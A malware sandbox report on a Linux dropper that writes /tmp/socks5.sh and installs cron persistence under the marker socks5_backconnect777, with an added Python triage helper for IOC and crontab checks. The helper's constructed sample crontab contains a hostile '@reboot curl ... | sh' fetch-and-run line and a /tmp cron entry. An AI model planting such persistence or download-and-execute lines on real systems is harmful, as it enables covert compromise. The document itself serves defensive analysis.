Analysis

  • max time kernel
    154s
  • max time network
    102s
  • platform
    linux_amd64
  • resource
    ubuntu1804-amd64-en-20211208
  • resource tags

    arch:amd64
    arch:i386
    image:ubuntu1804-amd64-en-20211208
    kernel:4.15.0-161-generic
    locale:en-us
    os:ubuntu-18.04-amd64
    system
  • submitted
    09-05-2023 04:53

General

  • Target

    server.out

  • Size

    15KB

  • MD5

    4e0a5548d669fb559fc9557c29d1300d

  • SHA1

    20c475d06b77ea4078db08814acebc6c9d8a47ca

  • SHA256

    b69738c655dee0071b1ce37ab5227018ebce01ba5e90d28bd82d63c46e9e63a4

  • SHA512

    7f128a3110bea36b22a3f784b991f0a4b44f2c01a5df837ac0badb3742f8da742f0bd971fa492829db413c9f69b6dd8c64ec6934b33da4ef11d0025522878dbb

  • SSDEEP

    192:GflaEbxJEYalA9qF9Aig5B7PNTa8EBiB6hygBCyftVm5cmF4tGEApxn:3UClA9kxg/FTyUM4gBCyftV2342px

Score
7/10

Malware Config

Signatures

  • Creates/modifies Cron job (1 TTP, 1 IoC)

    Cron allows running tasks on a schedule, and is commonly used for malware persistence. Here the dropped script installs a new user crontab by piping it into "crontab -" (PID 578); the sed filter in the process tree (PID 583) first deletes any existing lines containing the string socks5_backconnect777, so the entry can be re-installed without duplicating itself.

  • Executes dropped EXE (1 IoC)

    server.out writes /tmp/socks5.sh and runs it (PID 576); the script deletes itself with rm -rf once the crontab is in place (PID 580).

  • Reads runtime system information (1 IoC)

    Reads data from the /proc virtual filesystem.

  • Writes file to tmp directory (1 IoC)

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/server.out
    /tmp/server.out
    1⤵
    • Writes file to tmp directory
    PID:575
    • /tmp/socks5.sh
      /tmp/socks5.sh
      2⤵
      • Executes dropped EXE
      PID:576
      • crontab
        crontab -
        3⤵
        • Creates/modifies Cron job
        PID:578
      • rm
        rm -rf /tmp/socks5.sh
        3⤵
        PID:580
      • cat
        cat /dev/fd/63 /dev/fd/62
        3⤵
        PID:577
  • sed
    sed /socks5_backconnect777/d /dev/fd/62
    1⤵
    • Reads runtime system information
    PID:583
  • crontab
    crontab -l
    1⤵
    PID:584
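The /dev/fd/62 and /dev/fd/63 arguments in the tree are what bash process substitution (<( ... )) looks like to a tracer: the existing crontab is listed (crontab -l, PID 584), lines containing socks5_backconnect777 are deleted (sed, PID 583), the result is concatenated with new content (cat, PID 577) and piped into crontab - (PID 578). The content of the second substitution is not visible, so the exact cron line the dropper installs is unknown; the marker string is its de-duplication key. The script below is an added triage helper, not part of the sandbox output: it checks a file against the SHA-256 IOCs the report lists and scans a crontab listing for the marker, for commands living under /tmp (the report's "Writes file to tmp directory" behaviour), and for a download-and-execute pattern that is a general heuristic rather than something shown in this report. The crontab text embedded in it is constructed for the demo; the report gives only the hash of the 253-byte crontab that was written.

```python
"""Triage helper for the cron-persistence behaviour in this sandbox report.

Added example, not part of the report. IOC hashes are copied from the
report's General and Downloads sections; the marker comes from the sed
command line in the process tree; SAMPLE_CRONTAB is constructed.
"""
import hashlib
import re

# SHA-256 values copied from the report.
IOC_SHA256 = {
    "b69738c655dee0071b1ce37ab5227018ebce01ba5e90d28bd82d63c46e9e63a4": "server.out",
    "6c4668b770274cf679f6a8781c11d9df3b766325ee19b03ba780192e3a313493": "/tmp/socks5.sh",
    "d36ef9d046aa46e8966784b7cb4ee7cf00778215de50a9830cca8c9375449912": "crontab (tmp.rPSzjx)",
}

# The dropper's sed filter deletes crontab lines containing this string
# before installing the new crontab, so it also marks its own entry.
MARKER = "socks5_backconnect777"

# Persistent cron commands living in world-writable scratch dirs are a
# strong signal; /tmp is where this sample drops its script.
SUSPICIOUS_PATHS = ("/tmp/", "/dev/shm/", "/var/tmp/")

CRON_FIELDS = 5  # minute hour day-of-month month day-of-week


def match_ioc(data: bytes):
    """Return the IOC label if data hashes to a reported SHA-256, else None."""
    return IOC_SHA256.get(hashlib.sha256(data).hexdigest())


def parse_crontab(text: str):
    """Yield (schedule, command) for each active entry in a user crontab.

    Comments, blank lines and NAME=value environment lines are skipped;
    cron does not support inline comments, so a trailing '# marker' is
    part of the command and is returned with it.
    """
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):  # @reboot, @hourly, ...
            sched, _, cmd = line.partition(" ")
            yield sched, cmd.strip()
            continue
        parts = line.split(None, CRON_FIELDS)
        if len(parts) < CRON_FIELDS + 1 or "=" in parts[0]:
            continue  # environment line (MAILTO=, PATH=) or junk
        yield " ".join(parts[:CRON_FIELDS]), parts[CRON_FIELDS]


def flag_entries(text: str):
    """Return [(reason, command)] for crontab entries worth an analyst's look."""
    hits = []
    for _sched, cmd in parse_crontab(text):
        if MARKER in cmd:
            hits.append(("marker", cmd))
        elif any(p in cmd for p in SUSPICIOUS_PATHS):
            hits.append(("tmp-path", cmd))
        # Generic heuristic (assumption, not from the report): fetch-and-run.
        elif re.search(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", cmd):
            hits.append(("download-exec", cmd))
    return hits


# Constructed sample; the real 253-byte crontab is known only by its hash.
SAMPLE_CRONTAB = """\
# constructed sample crontab
MAILTO=""
0 3 * * * /usr/bin/apt-get update >/dev/null 2>&1
* * * * * /tmp/.x/run.sh >/dev/null 2>&1 # socks5_backconnect777
@reboot /bin/sh -c 'curl -s http://example.invalid/p | sh'
"""

if __name__ == "__main__":
    for reason, cmd in flag_entries(SAMPLE_CRONTAB):
        print(f"{reason:14s} {cmd}")
```

On a live host, feed the output of "crontab -l -u USER" or the files under /var/spool/cron/crontabs/ to flag_entries, and pass each dropped file's bytes to match_ioc; a hit on the crontab hash means the installed crontab is byte-identical to the one the sandbox captured.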

Network

MITRE ATT&CK Enterprise v6

Downloads

  • /tmp/socks5.sh

    Filesize

    200B

    MD5

    c7633fc3d5c9fd11a808d417f3c20fe9

    SHA1

    a3fca1a5cd8619e1eecc532b42dd5ec3a68ae2f7

    SHA256

    6c4668b770274cf679f6a8781c11d9df3b766325ee19b03ba780192e3a313493

    SHA512

    369c7be63ac24f3a94516671f1d8d4e61b1f2df4af59eee0c034d069c787d41c7e60321be0f31226a4fc047f606fcf22ce3ae8566b5918d75da36c7e1e1382c7

  • /var/spool/cron/crontabs/tmp.rPSzjx

    Filesize

    253B

    MD5

    2ccb7c92315681d496385384c7f998c4

    SHA1

    5b2baff7c4a9fd8e7ee3857932ded50060e997e3

    SHA256

    d36ef9d046aa46e8966784b7cb4ee7cf00778215de50a9830cca8c9375449912

    SHA512

    27366cb20280d394a3837bfc54fd2c41f20883cdbb9080599b57283e4efe2210c61116440ff0b9a217adcf8ce8298dd1f47347449c826a8f2dbc483952a400cd